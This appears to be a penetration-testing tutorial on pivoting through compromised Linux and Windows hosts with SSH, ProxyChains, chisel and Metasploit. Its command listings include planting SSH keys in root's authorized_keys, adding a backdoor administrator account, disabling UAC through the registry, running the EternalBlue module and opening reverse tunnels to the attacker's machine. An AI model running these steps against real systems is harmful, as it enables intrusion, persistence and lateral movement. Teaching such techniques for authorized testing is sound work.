The shades of tunneling

The shades of tunneling

Solution for common pivoting problems during a Penetration Test

by Karol Mazurek


SCENARIO I

You had gained root privilege over the Linux Server and conducted a host discovery in the internal network, that only the compromised host has access to. Now you want to pivot through this host. How to do it quickly?

1.1. SSH & PROXYCHAINS

### ON YOUR MACHINE (10.10.10.1)
#
CREATE A DIRECTORY FOR MANAGING KEYS
mkdir piv_keys && chmod 700 piv_keys
# GENERATE NEW SSH KEY
ssh-keygen -f piv_keys/id_rsa_1
# COPY PUBLIC KEY CONTENT TO CLIPBOARD
cat piv_keys/id_rsa_1 | clip.exe # OR JUST CAT AND COPY
### ON A COMPROMISED MACHINE (10.10.10.2)
# ADD YOUR SSH PUBLIC KEY TO authorized_keys
echo "ssh-rsa AAAA...[REDACTED]..." >> /root/.ssh/authorized_keys
### ON YOUR HOST (10.10.10.1)
# START SSH DYNAMIC PORT FORWARDING
ssh -D 9999 -f -N [email protected] -i piv_keys/id_rsa_1

ON YOUR HOST (10.10.10.1)
# CONFIGURE PROXYCHAINS
(/etc/proxychains4.conf)

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 9999

After adding the above line to the config file, you can start using any tool with proxychains , you can see some examples below:

How do ProxyChains actually works?

ProxyChains is a UNIX program, that hooks network-related libc functions in dynamically linked programs via a preloaded DLL and redirects the connections through SOCKS4/5 or HTTP proxies.

1. When you create a SSH tunnel between your starting machine (10.10.10.1) and Remote Server (10.10.10.2), to access the internal network (123.123.123.0/24) you additionally open TCP socket on port 9999 locally (127.0.0.1).

2. So now you need to somehow interact with this newly created socket (127.0.0.1:9999)which in fact works as a TCP Proxy Server to access the SSH tunnel between 10.10.10.1 and 10.10.10.2 and here comes the ProxyChains.

1.2. METASPLOIT & AUTOROUTE & PORTFWD

 

### ON YOUR HOST IN MSFCONSOLE (10.10.10.1)
# PIVOT USING ROUTE COMMAND
route add 123.123.123.0/24 2
# PIVOT USING AUTOROUTE
use post/multi/manage/autoroute
set session 2
run
# PIVOT USING AUTOROUTE IN METERPRETER SESSION
meterpreter> run autoroute -s 123.123.123.0/24
meterpreter> run autoroute -p

  • Now Metasploit modules will “automagically” pivot through the compromised host and the target systems on the internal network (123.123.123.0/24).
  • For example, you found that 123.123.123.4 is vulnerable to MS17–010 EternalBlue. To exploit this vuln, just run the proper module and set things up, like the target system is in your subnet:

 

### ON YOUR HOST IN MSFCONSOLE (10.10.10.1)
# EXPLOIT MS17–010 EternalBlue
use exploit/windows/smb/ms17_010_psexec
set LHOST 10.10.10.1
set RHOST 123.123.123.4
run
  • Another example, if you want to conduct TCP Connect Scan over the subnet 123.123.123.0/24:

ON YOUR HOST IN MSFCONSOLE (10.10.10.1)
# CONDUCT TCP CONNECT SCAN

use auxiliary/scanner/portscan/tcp
set RHOSTS 123.123.123.0/24
set PORTS 1-1024
set THREADS 50
run

  • If you want to connect with RDP using Metasploit Framework as a tunnel:

METASPLOIT TUNNEL FROM LOCALHOST TO 123.123.123.1 FOR RDP
portfwd add –l 3389 –p 3389 –r 123.123.123.1
### CONNECT USING TUNNEL
rdesktop 127.0.0.1:3389

SCENARIO II

You had managed to pivot through a compromised host (123.123.123.2) and gained a low privileged user CRIMSON\bofer on the Windows Server (123.123.123.3). During the investigation on the newly compromised host, you found that you can leverage the buffer overflow vulnerability, that lies in the printer.exe(service running on 127.0.0.1:4444) for privilege escalation to NT AUTHORITY\SYSTEM . You downloaded the vulnerable printer.exe to your machine, developed an exploit, wonder how to send it from your host (10.10.10.1) to the Windows Server (123.123.123.3) service printer.exe running on the loopback interface (127.0.0.1:4444)?

  • This time there is no way to use an SSH server on the target (Windows System 123.123.123.3since there is no SSH preinstalled and you have no privileges to install it.
  • In such a situation, it will be a good idea to use chisel.exe through a previously established SSH tunnel with ProxyChains for tunneling.
### ON YOUR HOST (10.10.10.1)
# START CHISEL SERVER ON PORT 8000
proxychains chisel server -p 8000 --reverse
# START NETCAT LISTENER ON PORT 4000
nc -nlvp 4000### ON A COMPROMISED MACHINE (123.123.123.3) 
# START CHISEL CLIENT 
chisel.exe client 10.10.10.1:8000 R:4000:127.0.0.1:4444



  • Now if you want to exploit buffer overflow on the vulnerable service available only on 127.0.0.1:4444 for the 123.123.123.3 from your machine (10.10.10.1), you have to run a developed exploit against 10.10.10.1:4000 on your host.

SCENARIO III

You had gained NT AUTHORITY\SYSTEM on another Windows Server (123.123.123.4) through MS17–010 EternalBlue and during the post-exploitation pillaging acquire a piece of information from the browser history of the user CRIMSON\karmaz that he was connecting to a website http://123.123.124.2:80/blog . That is why you conduct a host discovery of adjacent network segment (123.123.124.0/24)You have found one, new host from this subnet: 123.123.124.3. Now, how to proxy traffic to this newly found host from your starting machine (10.10.10.1)?

3.1. OpenSSH & PROXYCHAINS

  • Since you got NT AUTHORITY\SYSTEM you can install anything you want on the compromised Windows Server.
  • In such a scenario OpenSSH comes in handy, install it if it is not available.
### ON COMPROMISED HOST USING METERPRETER SESSION (123.123.123.4)
## GUIDE USING RDP:
# TURN ON RDP ON THE COMPROMISED MACHINE
run getgui -e
# ADD USER IF THERE ARE NON
run getgui -u karmazRDP -p karmaz!RDP123
# USER SHOULD BE IN ADMINISTRATOR GROUP, IF NOT - ADD HIM
shell
net localgroup administrators karmazRDP /add### ON YOUR HOST (10.10.10.1)
# CONNECT OVER PROXYCHAINS & RDP USING PREVIOUS TUNNEL
proxychains xfreerdp /u:DOMAIN\\karmazRDP /p:karmaz\!RDP123 /v:10.10.10.1### ON COMPROMISED HOST USING RDP WINDOW
# DOWNLOAD latest release of OpenSSH: LINK 
# INSTALL OpenSSH instructions:  LINK
# GENERATE NEW KEY PAIR
ssh-keygen
# START SSH AGENT & ADD NEW IDENTITY
Start-Service ssh-agent
ssh-add C:\Users\karmazRDP\.ssh\id_rsa
# ADD PUBLIC KEY TO authorized_keys 
copy content of ~\.ssh\id_rsa.pub 
add it to C:\ProgramData\ssh\administrators_authorized_keys
  • The tricky part is, if the user you logged in via SSH client is part of the local Administrator group, then his public key has to be added to C:\ProgramData\ssh\administrators_authorized_keys not to the
    C:\Users\<username>\.ssh\authorized_keys .
  • Another common problem is wrong permissions set on the file and you can mitigate this using the below PowerShell script:
$acl = Get-Acl C:\ProgramData\ssh\administrators_authorized_keys
$acl.SetAccessRuleProtection($true, $false)
$administratorsRule = New-Object system.security.accesscontrol.filesystemaccessrule("Administrators","FullControl","Allow")
$systemRule = New-Object system.security.accesscontrol.filesystemaccessrule("SYSTEM","FullControl","Allow")
$acl.SetAccessRule($administratorsRule)
$acl.SetAccessRule($systemRule)
$acl | Set-Acl

  • If you want to install OpenSSH from the command line, even if you are
    NT AUTHORITY\SYSTEM you have to switch off UAC because it will pop up a message window that you cannot handle from the command line.
## GUIDE USING COMMAND LINE (WITHOUT RDESKTOP)
# SET UAC TO 0
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
# REBOOT THE SYSTEM
shutdown /r
# RENEW THE METERPRETER SESSION AND FOLLOW THE RDP STEPS FROM ABOVE
  • Now to set a tunnel from 10.10.10.1 over 10.10.10.2 and over 123.123.123.4 to the 123.123.124.0/24 subnet, you have to use the same private key on the 10.10.10.1 and 10.10.10.2 which corresponding public key is added to the authorized_keys on the 123.123.123.4 .
### ON THE SECOND JUMP HOST - 123.123.123.4
Copy private key i.e. content of ~\.ssh\id_rsa### ON THE FIRST JUMP HOST - 10.10.10.2
# MAKE A BACKUP OF OLD ROOT PRIVATE KEY AND PUBLIC KEY
cp /root/.ssh/id_rsa /root/.ssh/id_rsa.bck
cp /root/.ssh/id_rsa.pub /root/.ssh/id_rsa.pub.bck
# MAKE NEW PRIVATE KEY FILE AND NAME IT id_rsa
# PASTE THE COPIED PRIVATE KEY FROM 123.123.123.4 IN ~/.ssh/id_rsa
# SET CORRECT PERMISSIONS
chmod 600 /root/.ssh/id_rsa
# CREATE NEW PUBLIC KEY
ssh-keygen -y -f /root/.ssh/id_rsa > /root/.ssh/id_rsa.pub### ON THE STARTING HOST - 10.10.10.1
# MAKE A BACKUP OF OLD ROOT PRIVATE KEY AND PUBLIC KEY
cp ~/.ssh/id_rsa ~/.ssh/id_rsa.bck
cp ~/.ssh/id_rsa.pub ~/.ssh/id_rsa.pub.bck
# PASTE THE COPIED PRIVATE KEY FROM 123.123.123.4 IN ~/.ssh/id_rsa
# SET CORRECT PERMISSIONS
chmod 600 ~/.ssh/id_rsa
# CREATE NEW PUBLIC KEY
ssh-keygen -y -f ~/.ssh/id_rsa > ~/.ssh/id_rsa.pub
# CREATE A TUNNEL
ssh -J [email protected] DOMAIN/[email protected] -N -f -D 9999
  • The reason why you have to generate a new public key is if it belongs to a different identity file, then the SSH client will not initiate the connection.
  • Now you can use this tunnel via ProxyChains as before in scenario 1 and packets will be tunneled from the starting machine (10.10.10.1) to any host in the 123.123.124.0/24 subnet.

3.2. CHISEL & PROXYCHAINS

  • The above example with OpenSSH is more persistent and stable, but it takes more time to set up and administrator privileges are needed if the sshd is not preinstalled and enabled.
  • A quick way to achieve the same goal could be to set up SOCKS Proxies with chisel.exe and chisel.elf .
### ON STARTING HOST
# BUILD chisel.elf FOR  FIRST JUMP HOST - 10.10.10.2
GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" .
# BUILD chisel.exe FOR  SECOND JUMP HOST - 10.10.10.2
GOOS=windows GOARCH=386 go build -ldflags="-s -w" .
# UPLAOD chisels TO FIRST JUMP HOST - 10.10.10.2
scp chisel [email protected]:/root/chisel
scp chisel.exe [email protected]:/root/chisel.exe
# OR DONWLOAD APPROPRIATE VERSION FROM RELEASE PAGE
https://github.com/jpillora/chisel/releases
# START THE CHISEL SERVER
./chisel server --socks5 --reverse -p 9001### ON THE FIRST JUMPHOST - 10.10.10.2
# CONNECT TO THE SERVER AND START REMOTE REVERSE ON 9998
./chisel client 10.10.10.1:9001 R:9998:socks &
# START THE CHISEL SERVER FOR SECOND JUMPHOST - 123.123.123.4
./chisel server --socks5 --reverse -p 9002### ON THE SECOND JUMPHOST - 123.123.123.4
# UPLOAD chisel.exe TO THE SECOND JUMPHOST AND RUN CHISEL CLIENT
.\chisel.exe client 123.123.123.2:9002 R:8888:socks
  • At the end edit the ProxyChains configuration file:

  • Now you can access the subnet 123.123.123.0/24 and the subnet 123.123.124.0/24 from your starting host 10.10.10.1 using ProxyChains

3.3. METASPLOIT & AUTOROUTE

  • You can use Metasploit if you managed to establish the meterpreter session with the (123.123.123.4).
  • You have the option to use this session for the second pivot to gain access to systems in the 123.123.124.0/24 subnet.
### ON YOUR HOST IN MSFCONSOLE (10.10.10.1)
# PIVOT USING ROUTE COMMAND
route add 123.123.124.0/24 3
# PIVOT USING AUTOROUTE
use post/multi/manage/autoroute
set session 3
run
# PIVOT USING AUTOROUTE IN METERPRETER SESSION
meterpreter> run autoroute -s 123.123.124.0/24
meterpreter> run autoroute -p
  • The Metasploit modules will “automagically” pivot through the (123.123.123.2) and then through (123.123.124.1) to access the internal network (123.123.124.0/24).

May 13, 2022
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
Inline Feedbacks
View all comments

© HAKIN9 MEDIA SP. Z O.O. SP. K. 2013